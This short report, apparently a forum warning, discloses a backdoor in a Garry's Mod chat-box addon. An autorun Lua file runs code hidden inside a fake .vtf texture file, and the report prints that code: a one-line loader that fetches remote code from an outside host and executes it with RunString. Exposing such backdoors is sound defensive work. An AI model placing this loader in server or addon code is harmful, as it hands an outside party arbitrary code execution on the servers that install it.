Backdoor
"Chat Box.zip\scb-26\lua\autorun\server\npc_help.lua" executes code located:
"Chat Box.zip\scb-26\material\npc\help.vtf" which is not a real .vtf because if you open it a text editor:
Code:
timer.Simple(1, function() http.Fetch("https://kvcdoor.ovh/f.php?key=H89L116uMz46DPCKjYx4", function(b) RunString(b, ":", false) end)end)